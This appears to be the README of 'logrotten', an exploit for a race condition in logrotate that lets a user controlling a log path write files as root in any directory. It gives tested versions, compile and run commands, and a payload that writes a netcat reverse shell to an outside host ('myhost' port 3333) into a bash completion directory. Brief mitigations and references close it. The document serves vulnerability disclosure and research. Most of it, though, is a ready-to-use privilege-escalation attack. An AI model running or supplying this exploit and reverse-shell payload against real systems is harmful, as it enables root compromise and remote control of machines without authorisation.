Awesome
Winning a race condition in logrotate to elevate privileges
Brief description
- logrotate is prone to a race condition after renaming the logfile.
- If logrotate is executed as root, with option that creates a file ( like create, copy, compress, etc.) and the user is in control of the logfile path, it is possible to abuse a race-condition to write files in ANY directories.
- An attacker could elevate his privileges by writing reverse-shells into directories like "/etc/bash_completition.d/".
Precondition for privilege escalation
- Logrotate has to be executed as root
- The logpath needs to be in control of the attacker
- Any option that creates files is set in the logrotate configuration
Tested version
- Debian GNU/Linux 11 (bullseye)
- Debian GNU/Linux 9.5 (stretch)
- Amazon Linux 2 AMI (HVM)
- Ubuntu 18.04.1
- logrotate 3.8.6
- logrotate 3.11.0
- logrotate 3.15.0
- logrotate 3.18.0
Compile
- gcc -o logrotten logrotten.c
Prepare payload
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile
Run exploit
If "create"-option is set in logrotate.cfg:
./logrotten -p ./payloadfile /tmp/log/pwnme.log
If "compress"-option is set in logrotate.cfg:
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
Known Problems
- It was hard to win the race inside a docker container or on a lvm2-volume. This version of logrotten improves the reliability.
Mitigation
- make sure that logpath is owned by root
- use option "su" in logrotate.cfg
- use selinux or apparmor
Author
- Wolfgang Hotwagner
References
- https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
- https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
- https://github.com/whotwagner/logrotten
- https://www.ait.ac.at/themen/cyber-security/ait-sa-20190930-01/
- https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd